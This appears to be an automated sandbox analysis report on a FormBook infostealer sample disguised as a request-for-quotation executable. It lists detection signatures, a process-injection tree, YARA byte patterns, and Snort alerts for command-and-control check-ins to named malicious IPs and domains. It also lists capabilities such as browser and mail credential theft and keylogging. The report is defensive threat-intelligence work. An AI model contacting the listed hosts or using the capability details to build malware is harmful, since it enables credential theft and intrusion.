Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ - MK FMHS.RFQ.24.101.exe

Overview

General Information

Sample name:RFQ - MK FMHS.RFQ.24.101.exe
Analysis ID:1467353
MD5:c8fe2e7043d030cf93cdab759d44f5e4
SHA1:fb166f49af2527ca5b90fa2538c2520727687331
SHA256:f78ebb5c21f07a42ed4351b7b8639d780f9d99a9afbb749daeaab9af97511acd
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ - MK FMHS.RFQ.24.101.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe" MD5: C8FE2E7043D030CF93CDAB759D44F5E4)
    • svchost.exe (PID: 1696 cmdline: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe (PID: 1396 cmdline: "C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_ssp.exe (PID: 1908 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp.exe" MD5: 6599A09C160036131E4A933168DA245F)
          • bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe (PID: 2844 cmdline: "C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2424 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • xl9lsbb.exe (PID: 5268 cmdline: "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe" MD5: C2F2B08E34FC25D172F2C3FCAB1ACFEB)
            • xl9lsbb.exe (PID: 888 cmdline: "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe" MD5: C2F2B08E34FC25D172F2C3FCAB1ACFEB)
              • bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe (PID: 3696 cmdline: "C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • runonce.exe (PID: 6240 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)
                  • bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe (PID: 3760 cmdline: "C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                  • firefox.exe (PID: 7012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2db43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17292:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x220fb:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xb6ca:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 28 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.2500000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.2500000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2db43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17292:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          13.2.xl9lsbb.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            13.2.xl9lsbb.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2d393:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16962:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            13.2.xl9lsbb.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              Click to see the 3 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", CommandLine: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", ParentImage: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe, ParentProcessId: 6776, ParentProcessName: RFQ - MK FMHS.RFQ.24.101.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", ProcessId: 1696, ProcessName: svchost.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", CommandLine: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", ParentImage: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe, ParentProcessId: 6776, ParentProcessName: RFQ - MK FMHS.RFQ.24.101.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", ProcessId: 1696, ProcessName: svchost.exe

              Snort Signatures

              Timestamp:07/04/24-03:12:38.577180
              SID:2855464
              Source Port:49761
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:12:35.806170
              SID:2855464
              Source Port:49758
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:29.265779
              SID:2855465
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:47.726029
              SID:2855464
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:11:49.918725
              SID:2855465
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:11:30.935623
              SID:2855464
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:25.838396
              SID:2855464
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:11:42.301664
              SID:2855464
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:10:37.155346
              SID:2855464
              Source Port:49737
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:12:43.659425
              SID:2855465
              Source Port:49763
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:12.602462
              SID:2855464
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:12:24.376986
              SID:2855465
              Source Port:49753
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:10:44.897966
              SID:2855465
              Source Port:49740
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:52.790653
              SID:2855465
              Source Port:49779
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:53.626059
              SID:2855465
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:11:28.369643
              SID:2855464
              Source Port:49742
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:45.175297
              SID:2855464
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:10.075816
              SID:2855464
              Source Port:49764
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:12:16.585944
              SID:2855464
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:30.898164
              SID:2855465
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:46.020455
              SID:2855464
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:17.664187
              SID:2855465
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:12:19.121759
              SID:2855464
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:10:20.795048
              SID:2855465
              Source Port:49736
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:11:44.836772
              SID:2855464
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:23.294796
              SID:2855464
              Source Port:49768
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:11:36.007994
              SID:2855465
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:10:39.695122
              SID:2855464
              Source Port:49738
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/04/24-03:13:48.555866
              SID:2855464
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://www.binpvae.lol/kfqo/Avira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: www.hsck520.comVirustotal: Detection: 5%Perma Link
              Source: www.qmancha.comVirustotal: Detection: 8%Perma Link
              Source: http://www.hsck520.comVirustotal: Detection: 5%Perma Link
              Multi AV Scanner detection for submitted file
              Source: RFQ - MK FMHS.RFQ.24.101.exeReversingLabs: Detection: 36%
              Source: RFQ - MK FMHS.RFQ.24.101.exeVirustotal: Detection: 36%Perma Link
              Yara detected FormBook
              Source: Yara matchFile source: 1.2.svchost.exe.2500000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.xl9lsbb.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.xl9lsbb.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.2500000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VT3g2PdlLRVpwBp[1].exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: RFQ - MK FMHS.RFQ.24.101.exeJoe Sandbox ML: detected
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: WeSe.pdb source: VT3g2PdlLRVpwBp[1].exe.3.dr, xl9lsbb.exe.3.dr
              Source: Binary string: WeSe.pdbSHA256F source: VT3g2PdlLRVpwBp[1].exe.3.dr, xl9lsbb.exe.3.dr
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4101090653.000000000055E000.00000002.00000001.01000000.00000004.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4102484254.000000000055E000.00000002.00000001.01000000.00000004.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 0000000E.00000002.4101091867.000000000055E000.00000002.00000001.01000000.00000004.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000000.3711234727.000000000055E000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: runonce.pdbGCTL source: xl9lsbb.exe, 0000000D.00000002.3647968012.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 0000000E.00000002.4102514343.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000001.00000003.1717916965.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1715600420.000000000281A000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102474122.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4110602768.0000000006950000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639103440.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639005571.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1749836614.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1641789169.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1749836614.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1643485880.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4105069211.0000000003B6E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1749852012.000000000367B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4105069211.00000000039D0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1751433381.0000000003820000.00000004.00000020.00020000.00000000.sdmp, xl9lsbb.exe, 0000000D.00000002.3648250842.0000000001360000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3647970854.00000000041C0000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3649509708.000000000437F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.0000000004530000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639103440.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639005571.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1749836614.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1641789169.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1749836614.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1643485880.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000003.00000002.4105069211.0000000003B6E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1749852012.000000000367B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4105069211.00000000039D0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1751433381.0000000003820000.00000004.00000020.00020000.00000000.sdmp, xl9lsbb.exe, 0000000D.00000002.3648250842.0000000001360000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3647970854.00000000041C0000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3649509708.000000000437F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.0000000004530000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000003.00000002.4106518555.0000000003FFC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003362000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003D8DC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: runonce.pdb source: xl9lsbb.exe, 0000000D.00000002.3647968012.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 0000000E.00000002.4102514343.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000003.00000002.4106518555.0000000003FFC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003362000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003D8DC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000001.00000003.1717916965.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1715600420.000000000281A000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102474122.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4110602768.0000000006950000.00000004.00000001.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00ED4696
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EDC9C7
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDC93C FindFirstFileW,FindClose,0_2_00EDC93C
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EDF200
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EDF35D
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EDF65E
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00ED3A2B
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00ED3D4E
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EDBF27
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FBBBE0 FindFirstFileW,FindNextFileW,FindClose,3_2_02FBBBE0
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4x nop then xor eax, eax3_2_02FA9730
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4x nop then mov ebx, 00000004h3_2_03790544

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49736 -> 165.154.0.120:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49737 -> 116.213.43.190:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49738 -> 116.213.43.190:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49740 -> 116.213.43.190:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49742 -> 207.148.37.252:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49743 -> 207.148.37.252:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49745 -> 207.148.37.252:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 116.213.43.190:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 116.213.43.190:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49749 -> 116.213.43.190:80
